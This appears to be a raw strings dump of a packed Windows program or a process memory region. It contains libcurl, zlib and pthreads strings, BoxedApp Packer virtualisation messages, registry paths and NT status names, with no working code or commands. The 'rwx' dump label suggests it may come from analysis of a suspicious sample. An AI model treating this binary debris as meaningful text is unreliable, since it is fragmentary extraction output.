ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
0@.bss
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_3500_rwx_00B20000_000AE000:




.text
`.rdata
@.data
.rsrc
@.reloc
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
